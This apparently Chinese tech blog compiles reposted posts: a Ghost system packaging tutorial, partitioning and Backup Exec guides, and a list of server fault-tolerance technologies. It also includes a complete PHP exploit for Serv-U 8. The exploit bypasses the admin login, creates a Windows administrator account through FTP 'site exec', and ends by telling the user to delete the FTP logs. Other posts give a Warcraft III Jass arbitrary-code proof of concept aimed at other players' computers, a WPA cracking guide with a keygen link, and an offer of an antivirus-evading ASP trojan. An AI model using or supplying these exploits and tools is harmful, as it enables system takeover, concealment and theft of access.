redwolf在路上

小兵的封装工具配合深度的精简系统做教程
首先，要安装系统，这里选的是深度的精简版5.6作为封装对象
如图


驱动文件要安装上

第二步，就是要进行一些系统的优化，安装驱动，打补丁，装软件，删东西节省空间

在这里具体的优化就不讲了，因为我用的是深度的精简版系统，里面已经做过一些优化了，就不再具体去优化
在这里就只给出一些个必须进行的设置,这是我从小兵的封装教程里面复制来的
1、选用免激活的版本安装盘，正常安装系统，打补丁，优化服务
这里选用深度XP精简版5.7，安装大约需要15-20分钟。
建议关闭系统还原及自定义通知，关闭远程，关闭共享，关闭休眠
注意声卡要驱动上，否则封装后的系统都不在任务栏显示音量。
运行一次windows meida player，避免以后出现向导
安装输入法，并在“区域和语言选项”的“高级”中，应用于默认用户账户。
我的文档，如果有需要也可以移动到D盘。
outlook不能保存密码及SQL安装挂起的问题，也可以在这里清理一下相关注册表。
2、安装需要的软件
OFFICE安装时要将“第一次使用时安装”的项目完全安装上，否则会以后提示插入光盘。
不建议安装杀毒软件，特别是卡巴斯基，该软件会与某封装工具冲突。
不建议安装虚拟光驱及刻录软件，已知部分软件在封装后失效。
不建议删除windows\Installer下的安装文件，可能会造成部分程序无法卸载。
3、封装准备
运行“gpedit.msc"打开组策略
“计算机配置\管理模板\系统”
启用“关闭 Windows Update 设备驱动程序搜索”
“管理模板/系统/Internet 通信管理/Internet 通信设置”
启用“关闭 Windows Update 设备驱动程序搜索”
“用户配置\管理模板\系统”
启用“配置驱动程序搜索位置” （不搜索软盘，光驱，Windows Update）
“用户配置\管理模板\系统”
忽略“设备驱动程序的代码签名”
检查系统属性中的驱动签名是否为忽略，update是否为从不搜索。
清理Documents and Settings目录，可以清理到10M以下。
当前账户\收藏夹，安装软件后经常有链接，清之~
当前账户\SendTo，邮件接收，建议删除
当前账户\Recent，历史记录，现在删了以后还得删
当前账户\Local Settings\Temp，临时文件，能删的全删
当前账户\Local Settings\Application Data下的图标缓存IconCache.db，约5-10M
当前账户\桌面，建议将所有图标移动到All Users\桌面
这些也只是我拷来的，如果有朋友想进行详细的优化的话，请参考以下两个帖子
小兵 的 Ghost系统封装教程及封装工具原理
地在要 的 做母盘流程
不知道别人都做什么，我只是把以下几个文件夹清理一下
要先把隐藏文件设置显示

打完补丁之后


还有如果安装了输入法之后，记着一定要进行如下设置
控制面板－区域和语言选项－高级

系统安装和优化，还有装软件的过程就不细说了，咱们直接进入主题
将一干软件先放到非系统分区的一个文件夹里面，这里我用的是
小兵的封装工具 Newprep v4.7.0301
驱动选择工具 7.0正式版
深度的双核补丁
还有从GHOST V7.0里面提取的 硬件工具
以及 龙帝国的 DLLCACHE备份文件
驱动包也是从 V7.0中提取出来的，配合驱动选择工具（如果有需要可以自行更改设置）

运行 Newprep v4.7.0301

将驱动包复制到C盘根目录下

进行封装工具的高级设置，因为做这个教程，所以只用了一少部分设置

接下来检查一下C:\WINDOWS\system32\dllcache下是否有文件存在
（在我的这个系统里面有不少东西，这个是系统的DLL文件的一个备份）

如果有文件的话就把 DLL文件备份程序 复制到 C:\WINDOWS\system32\ 目录下
如果该目录是空的话，就没必要进行这一步

接下来就开始进行 IDE控制器的修改，电源模式修改 以及 全部硬件的删除
IDE控制器修改详细说明一下，电源模式修改与之类似
IDE控制器修改
在设备管理器里面，选择当前电脑的IDE控制器，单击右键，选择更新驱动程序
然后就如图所示了，要仔细看看，图上没作标示





电源模式修改


卸载全部硬件
切记 系统设置 选项里面的东西就不要去动了

硬件卸载过程中如果出现如下提示，切记不可选择是，否则重启之后硬件又会全部安装上

硬件全部卸载之后一般来说会出现 如下图所示效果

最后我们就要进行封装了



接着前面的几步，如果 C:\WINDOWS\system32\dllcache 里面有东西的话
那么现在DLL文件备份程序就派上用场了
切记一定要选择上 “恢复时自动删除自己”


最后将 驱动选择工具及配置文件 还有双核补丁 放入 C:\WINDOWS\temp下
因为在封装工具高级设置中设置的路径是这个文件夹

（可能有朋友要问了，为什么不提前放进去呢？
那是因为在小兵的封装工具会在进行系统封装的时候自动清理掉系统临时文件以及一些垃圾文件。
呵呵，这可是我的血泪经验啊，就因为这个我没弄成功了好多个）
还有硬件工具文件夹也要放到 C:\Program Files 下

最后就是要清理一下开始菜单中的最近打开文件列表

作者：空虚浪子心

发布日期：2009-08-05
更新日期：2009-08-05

受影响系统：
serv-u8

不受影响系统：
其他版本不受影响

描述：
看cnbeta发现su出8这个版本了。
想想以前写过一个7的本地提权。
不知道8有什么安全方面的更改。
下载来研究下，发现居然还是可以提权的，只是su7的那个不能直接用，稍微修改了下执行的流程。

Su8的管理平台是http的，继承了su7的方式。
抓包，分析，发现了以下路程是可以利用的。
1， 管理员从管理控制台打开web页面时，是不需要验证密码的。
2， 管理员如果用某URL打开web页面时，虽然需要输入密码，但是无论输入什么，都可以进入。“/?Session=39893&Language=zh,CN&LocalAdmin=1”
3， 管理员可以添加用户有两种，一种是全局用户，一种是某个域下的用户。而权限设置也是两种，一种是全局，一种是针对用户。
4， 管理员添加了用户的这个包和设置权限这个包，是分开的。
所以，我可以抓包然后转换成php的socket连接post出去。
最后在用经典的ftp登陆，exec命令。达到提权。

前面su7已经说了很多，这里简单的说下好了。
.....登陆什么的。
1，获取ID。
2，给这个id添加权限。
3，给这个id赋予用户名，密码，目录，权限。
4，登陆后执行系统命令。

这段代码是不能直接当工具使用的。

<*来源：kxlzx（www.inbreak.net）
*>

测试方法：

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?/*serv-u 8 local exp ver 1.0如果你在自己的服务器上发现这个文件，厄。。。那太遗憾了，别来找我。这个文件到处都是，人人都能拿到。*/?><html><title>Serv-u 8 local exp ver 1.0</title><body><script>function fun_showDiv(show){document.getElementById(show).style.display="block";}</script><b>Serv-u 8 local exp ver 1.0</b><form id="form1" name="form1" method="post" action="?"><p><a href="#" onclick="fun_showDiv('adminpassdiv')">管理员密码</a><input type="text" name="admin_pwd" value="" /></p><p>直接提权！<input type="submit" name="cmd" value="提权" /><a href="#" onclick="fun_showDiv('QAdiv')">QA</a></p><pre><?//Global var$port=43958;$host="127.0.0.1";$sessionid="";$getuserid="";$ftpport=21;$ftpuser="lalala_hacked";$ftppwd=$_POST['admin_pwd'];$exec_addUser="site exec c:/windows/system32/net.exe user ".$ftpuser." ".$ftppwd." /add";$exec_addGroup="site exec c:/windows/system32/net.exe localgroup administrators ".$ftpuser."  /add";if($_POST['cmd']) {//login-----------------------------------------$sock_login = fsockopen($host, $port);$URL='/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543';$post_data_login['user'] = "";$post_data_login['pword'] = $ftppwd;$post_data_login['language'] = "zh%2CCN&";$ref="http://".$host.":".$port."/?Session=39893&Language=zh,CN&LocalAdmin=1";$postStr = createRequest($port,$host,$URL,$post_data_login,$sessionid,$ref);fputs($sock_login, $postStr);$result = fread($sock_login, 1280);$sessionid = getmidstr("<sessionid>","</sessionid>",$result);if ($sessionid!="")echo "登陆成功！";fclose($sock_login);//login-----------------------------------------//getOrganizationId-------------------------------$OrganizationId="";$sock_OrganizationId = fsockopen($host, $port);$URL='/Admin/ServerUsers.htm?Page=1';$postStr = createRequest($port,$host,$URL,"",$sessionid,"");fputs($sock_OrganizationId, $postStr);$resultOrganizationId="";while(!feof($sock_OrganizationId)) {$result = fread($sock_OrganizationId, 1024);$resultOrganizationId=$resultOrganizationId.$result;}$strTmp = "OrganizationUsers.xml&ID=";$OrganizationId = substr($resultOrganizationId,strpos($resultOrganizationId,$strTmp)+strlen($strTmp),strlen($strTmp)+15);$OrganizationId = substr($OrganizationId,0,strpos($OrganizationId,"\""));fclose($sock_OrganizationId);if ($OrganizationId!="")echo "获取OrganizationId".$OrganizationId."成功！";//getOrganizationId-------------------------------//getuserid---------------------------------------$getuserid="";$sock_getuserid = fsockopen($host, $port);$URL="/Admin/XML/User.xml?Command=AddObject&Object=COrganization.".$OrganizationId.".User&Temp=1&Sync=546666666666666663";$ref="http://".$host.":".$port."/Admin/ServerUsers.htm?Page=1";$post_data_getuserid="";$postStr = createRequest($port,$host,$URL,$post_data_getuserid,$sessionid,$ref);fputs($sock_getuserid, $postStr);$result = fread($sock_getuserid, 1280);$result = getmidstr("<var name=\"ObjectID\" val=\"","\" />",$result);fclose($sock_getuserid);$getuserid = $result;if ($getuserid!="")echo "获取用户ID".$getuserid."成功！";//getuserid---------------------------------------//addpower-----------------------------------------$sock_addpower = fsockopen($host, $port);$URL="/Admin/XML/Result.xml?Command=AddObject&Object=CUser.".$getuserid.".DirAccess&Sync=1227081437828";$post_data_addpower['Access'] = "7999";$post_data_addpower['MaxSize'] = "0";$post_data_addpower['Dir'] = "c:\\";$post_data_addpower['undefined'] = "undefined";$postStr = createRequest($port,$host,$URL,$post_data_addpower,$sessionid,"http://127.0.0.1".":".$port."/Admin/ServerUsers.htm?Page=1");fputs($sock_addpower, $postStr,strlen($postStr));$result = fread($sock_addpower, 1280);fclose($sock_addpower);echo "添加权限成功！";//addpower-----------------------------------------//adduser-----------------------------------------$sock_adduser = fsockopen($host, $port);$URL="/Admin/XML/Result.xml?Command=UpdateObject&Object=COrganization.".$OrganizationId.".User.".$getuserid."&Sync=1227071190250";$post_data_adduser['LoginID'] = $ftpuser;$post_data_adduser['FullName'] = "";$post_data_adduser['Password'] = 'hahaha';$post_data_adduser['ComboPasswordType'] = "%E5%B8%B8%E8%A7%84%E5%AF%86%E7%A0%81";$post_data_adduser['PasswordType'] = "0";$post_data_adduser['ComboAdminType'] = "%E6%97%A0%E6%9D%83%E9%99%90";$post_data_adduser['AdminType'] = "";$post_data_adduser['ComboHomeDir'] = "/c:";$post_data_adduser['HomeDir'] = "/c:";$post_data_adduser['ComboType'] = "%E6%B0%B8%E4%B9%85%E5%B8%90%E6%88%B7";$post_data_adduser['Type'] = "0";$post_data_adduser['ExpiresOn'] = "0";$post_data_adduser['ComboWebClientStartupMode'] = "%E6%8F%90%E7%A4%BA%E7%94%A8%E6%88%B7%E4%BD%BF%E7%94%A8%E4%BD%95%E7%A7%8D%E5%AE%A2%E6%88%B7%E7%AB%AF";$post_data_adduser['WebClientStartupMode'] = "";$post_data_adduser['LockInHomeDir'] = "0";$post_data_adduser['Enabled'] = "1";$post_data_adduser['AlwaysAllowLogin'] = "1";$post_data_adduser['Description'] = "";$post_data_adduser['IncludeRespCodesInMsgFiles'] = "";$post_data_adduser['ComboSignOnMessageFilePath'] = "";$post_data_adduser['SignOnMessageFilePath'] = "";$post_data_adduser['SignOnMessage'] = "";$post_data_adduser['SignOnMessageText'] = "";$post_data_adduser['ComboLimitType'] = "%E8%BF%9E%E6%8E%A5";$post_data_adduser['LimitType'] = "Connection";$post_data_adduser['QuotaBytes'] = "0";$post_data_adduser['Quota'] = "0";$post_data_adduser['Access'] = "7999";$post_data_adduser['MaxSize'] = "0";$post_data_adduser['Dir'] = "%25HOME%25";$postStr = createRequest($port,$host,$URL,$post_data_adduser,$sessionid,"http://127.0.0.1".":".$port."/Admin/ServerUsers.htm?Page=1");fputs($sock_adduser, $postStr,strlen($postStr));$result = fread($sock_adduser, 1280);fclose($sock_adduser);echo "添加用户成功！";//adduser-----------------------------------------//exec-------------------------------$sock_exec = fsockopen("127.0.0.1", $ftpport, &$errno, &$errstr, 10);$recvbuf = fgets($sock_exec, 1024);$sendbuf = "USER ".$ftpuser."";fputs($sock_exec, $sendbuf, strlen($sendbuf));$recvbuf = fgets($sock_exec, 1024);$sendbuf = "PASS hahaha";fputs($sock_exec, $sendbuf, strlen($sendbuf));$recvbuf = fgets($sock_exec, 1024);$sendbuf = $exec_addUser."";fputs($sock_exec, $sendbuf, strlen($sendbuf));$recvbuf = fread($sock_exec, 1024);echo "执行".$exec_addUser."返回了$recvbuf";fclose($sock_exec);$sock_exec = fsockopen("127.0.0.1", $ftpport, &$errno, &$errstr, 10);$recvbuf = fgets($sock_exec, 1024);$sendbuf = "USER ".$ftpuser."";fputs($sock_exec, $sendbuf, strlen($sendbuf));$recvbuf = fgets($sock_exec, 1024);$sendbuf = "PASS hahaha";fputs($sock_exec, $sendbuf, strlen($sendbuf));$recvbuf = fgets($sock_exec, 1024);$sendbuf = $exec_addGroup."";fputs($sock_exec, $sendbuf, strlen($sendbuf));$recvbuf = fread($sock_exec, 1024);echo "执行".$exec_addGroup."返回了$recvbuf";fclose($sock_exec);echo "好了，自己3389上去清理ftp用户日志吧！";//exec-------------------------------}/** function createRequest@port_post : administrator port $port=43958;@host_post : host $host="127.0.0.1";@URL_post : target $URL='/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543';@post_data_post : arraylist $post_data['user'] = "";...@return httprequest string*/function createRequest($port_post,$host_post,$URL_post,$post_data_post,$sessionid,$referer){$data_string="";if ($post_data_post!=""){foreach($post_data_post as $key=>$value){$values[]="$key=".urlencode($value);}$data_string=implode("",$values);}$request.="POST ".$URL_post." HTTP/1.1";$request.="Host: ".$host_post."";$request.="Referer: ".$referer."";$request.="Content-type: application/x-www-form-urlencoded";$request.="Content-length: ".strlen($data_string)."";$request.="User-Agent: Serv-U";$request.="x-user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)";$request.="Accept: */*";$request.="Cache-Contro: no-cache";$request.="UA-CPU: x86";if ($sessionid!=""){$request.="Cookie: Session=".$sessionid."";}$request.="";$request.=$data_string."";return $request;}//getMidfor2str copy from internetfunction getmidstr($L,$R,$str){$int_l=strpos($str,$L);$int_r=strpos($str,$R);If ($int_l>-1&&$int_l>-1){$str_put=substr($str,$int_l+strlen($L),($int_r-$int_l-strlen($L)));return $str_put;}elsereturn "没找到需要的变量";}?></pre></form><div id="adminpassdiv" style="display:none"><pre>默认为空，如果密码为空，<b>填什么都能进去。</b>如果修改过，管理员密码默认会在这里：<b>C:\Program Files\RhinoSoft.com\Serv-U\Users\Local Administrator Domain\.Archive</b>文件中找到一个MD5密码值。C:\Program Files\RhinoSoft.com\Serv-U是su的根目录。密码值的样式为(假设是123456)kx########################代表123456的32位MD5加密，而kx则是su对md5的密码算法改进的随机2位字符。破解后的密码为<b>kx</b>123456，去掉kx就是密码了。你可以针对这个加密生成字典。</pre></div><div id="QAdiv" style="display:none"><pre><b>提权的原理？</b>Su8的管理平台是http的，继承了su7的方式。抓包，分析，发现了以下路程是可以利用的。1，  管理员从管理控制台打开web页面时，是不需要验证密码的。2，  管理员如果用某URL打开web页面时，虽然需要输入密码，但是无论输入什么，都可以进入。“/?Session=39893&Language=zh,CN&LocalAdmin=1”3，  管理员可以添加用户有两种，一种是全局用户，一种是某个域下的用户。而权限设置也是两种，一种是全局，一种是针对用户。4，  管理员添加了用户的这个包和设置权限这个包，是分开的。所以，我可以抓包然后转换成php的socket连接post出去。最后在用经典的ftp登陆，exec命令。达到提权。前面su7已经说了很多，这里简单的说下好了。.....登陆什么的。1，获取ID。2，给这个id添加权限。3，给这个id赋予用户名，密码，目录，权限。4，登陆后执行系统命令。<b>为啥我明明显示成功了，但是却提不上去？</b>这要看错误代码了，这里偶很惭愧，并没有写详细的错误代码判断。一般有以下几种情况：1，可能是因为管理员密码不对。参照管理员密码的连接。2，可能是因为管理员限制了执行SITE EXEC。有待程序修改，程序可以加一个让他不限制的功能。3，可能是程序问题。</pre></div></body></html>

建议：
目前厂商没有任何补丁，要不大家再等等？
不过以前SU7本地溢出推出来，也没见到什么动静。-_-!
先把本地管理密码改复杂点应付着吧。
Tags: Serv-U, 提权

# 鬼仔：这个洞貌似很早以前就出了，暴雪也已经出了补丁，但是
ring04h：暴雪在1.24上，做出了修复工作，但是国内的完全全部都徘徊在1.20版，谁都不会去更新。 对于国内玩家，这个漏洞利用率能够稳定在90%上。

作者：ring04h

War3 Jass虚拟机经测试，存在严重漏洞！允许运行时动态创建并执行任意机器码
Jass属于War3为地图开发者提供的一套脚本语言，方便开发者开发或建立修改属于自己的地图。
经过推断，CS (cstrike)可能也存在此类问题。

利用方式：登陆浩方或者VS对战平台，修改某张地图(例如DOTA的地图)，开启游戏，等待其他玩家进入，开始游戏，即可执行任意机器码，控制玩家计算机。

Jass语言的用处
Jass(正确地说是Jass2)是魔兽3的脚本语言, 用于控制地图的进程和行为, 是魔兽游戏和地图的基础. 正常的地图编辑中摆放的单位(Unit), 设置的触发(Trigger)等最终都会被翻译成Jass语言存在地图文件里在游戏时被调用.

POC:

set bj_meleeTwinkedHeroes[1024] = 0x90909090
set bj_meleeTwinkedHeroes[1025] = 0x90909090 //and other bytecode giberish.
...

local code C = I2Code( code2I(function GetRandomDirectionDeg) + 0xC92D8 )

call TriggerAddAction(t, C)
call TriggerExecute(t)

//It will run whatever bytecode 90 90 90 90 means

function main takes nothing returns nothing
set t = CreateTrigger()
call TriggerAddAction(t, i2code(0x00929217) )
a[0]=0x45623512
a[1]=0x34562323
a[2]=0x62329301
...
//other thousand lines of this
...
b[0]=0x12312333
endfunction

上图：

文章标题加上了by ring04h,是说明ring04h将对以上的言论负责，其它稍后再编辑详情，上POC！

转载自网络

引用

前言：
刚买回来的本本，都只有一个分区，在有重要资料时候十分不方便，而又怕重分区破坏系统，破坏还原怎么办？不用发愁，看看Acronis Disk Director Suite这个强大的工具吧

说明：
Acronis Disk Director Suite 最新版10支持对Vista的分区操作，重定义大小，设置硬盘十分方便，它功能强大，分区快速。操作完分区后不会破坏你的原系统，也不会破坏装在OEM本本里的系统恢复程序。
当你分完区后又可以卸载它，而完全没有依赖。很好很方便的程序

工具下载：

推荐使用英文版操作，这个软件没有出中文版，中文大多是国内朋友汉化，有兴趣的朋友可以试一下，本文以英文版通用为主。方便大家参考

Acronis Disk Director Suite

迅雷下载：
http://www118.fixdown.com/Acronis.Disk.Director.Suite.rar

by:wangbin5542

引用
详细内容：
本文全部内容加载在图中，只有11部分做了详细说明：
共18张图

对上图的说明：
对于Acronis Disk Director Suite的功能进行了详细的说明

对于上图的详细说明：
11.然后在图形中的空白区点Create Partition
Partition Label:卷标（可为空）
File System:文件系统（VISTA默认为NTFS）
Create as:选择Logical Partition 存分区
Size and position：在这里当然是选择分区的大小
当然也可以在Partition Size中输入想要的大小空间

完~~~~~
BY:wangbin5542制作
本贴来自天极网群乐社区--http://q.yesky.com/group/review-17544152.html

作者：longas

现在很多朋友都在学习和研究WPA的破解及WPA PMK Hash破解，关于WPA PMK Hash的创建及使用，我已经在《无线网络安全攻防实战》一书中给出详细操作实例，并且为了给大家提供一个练手的机会，ZerOne安全团队无线安全组也在广州安全交流会上无偿提供给大家高达4.3GB的WPA PMK Hash Table DVD光盘镜像下载（大家可到Anywlan论坛或者我的Blog查看下载地址），呵呵，虽然也受到了一些莫名其妙的指责。但是作为高速破解的途径来说，从一开始，就不止Hash这一种方法，这里我要讲述的就是在未来几年内将会成为主流的破解方法---GPU运算破解。

关于GPU运算用于无线安全领域，ZerOne安全团队无线安全组已经于2008年中展开自主研发，并已取得一些成果，本文为引导更多朋友了解此类技术所写的基础工具型破解教程，望同一方向的朋友能和我联系，欢迎大家的交流。
好了话不多说，单机环境下只要配合合适的显卡，速度可以飙升到1万以上，若是性能优异的显卡可达到5万甚至更高。关于此类工具的详细安装、操作、破解、问题解答、软件下载内容我已经全部整理成基础破解教程，提供给大家下载。

文中涉及软件：Elcomsoft Wireless Security Auditor（简称为EWSA）

软件版本：v1.0.0.133版

支持系统：Windows 2000/XP/2003/Vista/2008

软件下载：http://www.elcomsoft.com/ewsa.html

--------------------------------------------------------------

详细长达11页的GPU运算破解WPA-PSK实战操作教程，下载地址如下

http://www.box.net/shared/ygjeeim9ms

GPU相关软件EWSA及注册机下载地址如下

http://www.box.net/shared/h2n1mnhgqq

转载自网络

现在服务器中存储的信息越来越多，而且也越来越重要；为防止服务器发生意外或受到意外攻击，而导致大量重要的数据丢失，服务器一般都会采用许多重要的安全保护技术来确保其安全。下面就介绍一些主要的服务器安全热点技术。
1. iSCSI技术
iSCSI技术是一种新型储存保护技术，该技术是将现有SCSI接口与以太网络(Ethernet)技术结合，使服务器可与使用IP网络的储存装置互相交换资料。该技术不仅价格较目前普遍使用的业界技术标准Fibre Channel 低廉，而且系统管理人员可以用相同的设备来管理所有的网络，并不需要以另外的设备来进行网络的管理。
iSCSI技术是由IBM下属的两大研发机构——加利福尼亚Almaden和以色列Haifa研究中心共同开发的，是一个供硬件设备使用的、可以在IP协议上层运行的SCSI指令集。简单地说，iSCSI可以实现在IP网络上运行SCSI协议，使其能够在诸如高速千兆以太网上进行路由选择。
现在，许多网络存储提供商致力于将SAN(Storage Area Network，存储区域网络)中使用的光纤通道设定为一种实用标准，但其架构需要高昂的建设成本，这不是一般的企业所能够承受的；与之相对，NAS技术虽然成本低廉，但是却受到带宽消耗的限制，无法完成大容量存储的应用，而且系统难以满足开放性的要求。iSCSI技术的使用在以上两者之间架设了一道桥梁。iSCSI技术是基于IP协议的技术标准，实现了SCSI和TCP／IP协议的连接，对于以局域网为网络环境的用户，只需要不多的投资，就可以方便、快捷地对信息和数据进行交互式传输和管理。
虽然iSCSI基于IP协议，却拥有SAN大容量集中开放式存储的品质。这一技术对于一边要面对信息高速增长，另一边却身处“数据孤岛”的众多中小企业无疑具有巨大的吸引力。
2. 全自动备份技术
该技术是在网络系统上建立起两套同样的且同步工作的文件服务器，如果其中一套出现故障，另一套将立即自动接入系统，接替发生故障的文件服务器的全部工作。通过使用该技术，可以确保容错系统的数据信息在由于系统或人为误操作造成损坏或丢失后，能及时在本地实现数据快速恢复；另外，该技术还可以确保容错系统在发生不可预料或抵御的地域性灾难（地震、火灾、机器毁坏等）时，及时在本地或异地实现数据及整个系统的灾难恢复。
3. 事务跟踪技术
该技术是针对数据库和多用户软件的需要而设计的，用以保证数据库和多用户应用软件在全部处理工作还没有结束时，或者在工作站或服务器发生突然损坏的情况下，能够保持数据的一致。其工作方式是：对指定的事务（操作）要么一次完成，要么什么操作也不进行。
4. 自动检验技术
一般来说，在对错误的或者被损坏的数据进行恢复之前，系统必须要有能力来及时发现引起这些错误的原因，所以，一个完整的容错系统应该离不开自动检验技术的支持。自动检验技术是用于故障快速检测的一种有效手段，特别是具有完全自校验性质的自校验装置，它不仅能及时检查出系统模块的差错，还能够检测出自身的差错。在设计一个容错系统时，如果正确地使用自动检验技术，可以大大提高系统对差错的反应能力，使差错的潜伏期缩短，有效地阻止错误的进一步蔓延，从而有利于其他技术功能及时对错误做出相关的纠正措施。
5. 内存纠错技术
该技术是一种服务器透明检测及故障纠错技术，它在发现并更正一个内存错误的同时，可使坏数据位从RAM上被擦除，从而有效减少无法更正的多位错误的发生。
6. 热定位技术
该技术也是一种检查数据错误的技术，该技术可以对写入磁盘的数据进行一些检查比较工作，从而确定刚刚读入的数据是否正确或者是否有其他方面的问题。在进行检修比较工作时，该技术可以自动从硬盘中把刚写入的数据读出来与内存中的原始数据进行比较。如果出现错误，则利用在硬盘内开设的一个被称为 “热定位重定区”的区，将硬盘坏区记录下来，并将已确定的坏区中的数据用原始数据写入热定位重定区中。
7. 自动重启技术
自动重启技术是指PC服务器可以在无人管理的情况下完成重新启动过程，以极快的速度恢复系统运行。
8. 网络监控技术
该技术可以让用户在一台普通的客户机上即可监测网络上所有使用的服务器，监控和判断服务器是否“健康”，一旦服务器的机箱、风扇、内存、处理器、系统信息、温度、电压或第三方硬件中的任何一项出现错误，就会报警提示管理人员。值得一提的是，监测端和服务器端之间的网络可以是局域网，也可以是广域网，直接通过网络对服务器进行启动、关闭或重新置位，极大地方便了管理和维护工作。
9. 故障的在线修复技术
故障的在线修复技术包括故障部件可带电插拔和部件的在线配置技术。可带电插拔的部件有硬盘、内存、外设插卡、电源、风扇等，目前PC服务器中值得骄傲的技术是PCI的热插拔。模块化设计将是今后的发展方向。
10. 文件分配表和目录表技术
硬盘上的文件分配表和目录表存放着文件在硬盘上的位置和文件大小等信息，如果它们出现故障，数据就会丢失或误存到其他文件中。通过提供两份同样的文件分配表和目录表，把它们存放在不同的位置，一旦某份出现故障，系统将做出提示，从而达到容错的目的。
11. VersaStor技术
该技术是康柏电脑公司在数据存储方面的力作之一，它最大的亮点是首次实现了网络存储池的概念，以消除目前广泛存在于不同存储系统之间的界限，这样就能在不同的存储系统之间进行轻松的存储和管理。另外，存储池的容量还可以根据不同服务器和应用程序动态而透明地缩放，支持不同服务器数据的无缝、透明移植。VersaStor技术能为任何一个与SAN网络连接的在线存储系统提供存储空间的获取与存放，而无须考虑生产商；而且该技术简化了存储系统的部署，对存储的管理由一般的机械劳动提升到了一个较高的级别。
12. AutoRAID技术
该技术是综合了不同RAID优点的多级RAID阵列技术，它将最近使用的数据放在按RAID 0/1存储的快速高性能的硬盘中，将不太常用的数据放在RAID5存储的经济高效的硬盘中。有了AutoRAID，系统的安装、配置和扩展变得简单而容易，该技术不再需要将数据转移到阵列中的其他硬盘上，只需将新硬盘安装好，AutoRAID就可以自动地判断硬盘大小，并将它加入硬盘阵列中；系统马上就可以利用新硬盘的空间，并将更多的数据按RAID 0/1存储，以提高系统的性能和存取速度。此外，AutoRAID能够管理由不同容量硬盘组成的硬盘阵列。

因最近使用到这个软件进行服务器备份所以转载网上的一篇使用心得.

使用Backup Exec11d有一段时间了，对于学习的过程，可谓喜忧参半。刚拿到产品和LTO3磁带机时，硬件的安装倒很轻松，软件安装的过程却因为授权的问题折腾了我好几天，Backup Exec的安装序列号，每张光盘上都有，我一共收到了五张光盘，并且每张上面都有重复的Anget授权，而且SN号都不一样，结果到最后实在没有办法了，将所有的SN号都录入才解决60天试用的问题。

对于初学者，洋洋洒洒的千多页的管理指南是个挑战，我也只是看了近十来页，就看不下去了。想想，网上或许有现成的教程可以快速入门，结果也是大海捞针，都非常的凌散，不过在Verycd上找到一个国外的视频教学，介绍的也比较简单，尽管听不懂讲师在嘀咕些什么，但从视频操作上也大致了解一二，Symantec的培训费用高得吓人，一天就是3KRMB.并且对于针对OEM用户都不赠送免费的培训服务。

本人所在的组织购买Backup exec主要用于对现有的SQL、Exchange、File进行备份，共八台服务器，初期的测试过程非常不顺利。现将个人的一些体会小结一下，以方便各位从未接触过该类产品的初学者。

____________________________________

首先要搞懂三个概念：介质、介质集、暂存介质、附加周期、覆盖周期。

简单来讲，介质就是物理上的磁盘或磁带等存储介质，而介质集，则是这些介质的一个集合，每一个介质集都有一些管理规则，比如：覆盖周期和附加周期等，加入到该介质集中的介质自动应用这些管理规则。而新介质、空白介质和清理过的介质都会自动与暂存介质关联。

覆盖周期是指数据在被覆盖之前在介质上所能保留的时间长度，而附加周期则指，数据在添加到介质之前的时间长度。通常来讲，暂存介质都是 永久数据，不能被覆盖，但可以附加，直止到磁带空间已满为止。

现在假设手头上有一个备份需求，要求是：周五全备份，周一至周四是增量备份。根据这个需求，可以这样来处理：

1、为每盒磁带做好标识（磁带盒里配备有标签），如周一、周二….周五，这样做的目标是让任何只都知道这盒磁带是周几用的，当然你还可以在标签上注册备份类型，如全备份、增量或是差异。

2、建立介质集，在这里我建了五个介质集，分别为星期一、星期二…..星期五。

3、为每个介质集设置覆盖周期和附加周期，这个要根据自己的实际情况来定，在这里我设置的是每四周（一个月）覆盖一次，可附加周期为一周（即从第二周开始就可以附加数据）。

4、插入一个空白的磁带（周一）， 记住每次插入空白磁带之后一定要“列清单”，在存储设备－所有设备下找到某个设备，然后右键单击列清单。

5、列完清单之后，在右侧会显示相关的磁带信息，包括，介质标签、介质描述以及所属介质集等等。注意空白的磁带的介质标签是显示为？的，并且该介质属于暂存介质。

6、对该空白介质进行快擦除(如上图菜单），这种擦除动作类似于硬盘的格式化，快擦除可以理解为快速格式化。

7、快擦除完成之后，请重命名该介质的介质标签，并且将介质与介质集周一相关联。

8、完成以上步骤之后，右键单击存储设备，选择弹出，同时再插入另外一张 空白磁带，并执行4－7步骤，完成所有的介质与介质集的关联。

9、完成之后，每一个介质都对应其相应的介质集。

至此，我们可以开始做备份。

10、点击“工具”－“向导”－“备份向导”，在弹出的对话框中点击“下一步”。

11、选择你需要备份的项目（此例中只选择了备份Mzlserver6的系统状态），完成后点击“下一步”

12、测试当前的当前的系统管理帐号是否具备在目标服务器上的备份权限,点击“下一步”继续。

13、显示要备份的项目。点击“下一步”继续。

14、设置“备份名称”和“备份集名称”。点击“下一步”继续。

15、选择备份设备和您想使用的介质集，本例中选择介质集“星期五”。点击“下一步”继续。

16、备份覆盖方法，此例使用默认值“附加介质，如果没有附加介质则覆盖”。点击“下一步”继续。

17、完成备份向导。此例中选择不立即运行，而是作为计划自动运行。点击“完成”

建立计划任务

18、在计划管理界面，选择“按计划运行”,并点击“编辑计划详细信息”

19、在高级计划选项中，使用预定周日，并选择每周五。完成后，点击递交。

20、设置该计划的开始时间，如每周五晚上23：00开始。

至此，完成一个备份任务，同理，依次设置好周一、周二、周三、周四的增量备份计划即可。

一台DC,一台域成员机器，一台客户机。DC装两块网卡，一个内网，一个外网。
1，配置远程访问，启用路由与远程访问服务。

思易免杀ASP木马3.0（最新两款)出来有一段时间了,前些时间做前二个月做渗透时用了一下,感觉还不错,在网上有很多下载的地方,这儿也提供下, 点击下载

网上的一些无线天线DIY图片:)

这二天搬新住所在用TPLINK WA501G+临时蹭网,懒得写，在网上转了一篇：）蹭网不道德，临时蹭一下就可以了，本案例也可用于公司无线局域网配置。如果你公司是多层楼房，架设无线局域网就可以使用这种方法，每层放一两个无线AP即可。

      双击我的电脑不能正常打开,显示打开方式,解决的方法如下:

点开始，在运行一下这命令：reg add "HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell" /ve /d none /f 

OK!

很多网友在网上找服务器备份软件,百度上也找不到几个好用的,发一个比较不错的服务器备份软件,希望有所帮助,Symantec Backup Exec for Windows Servers v12.5

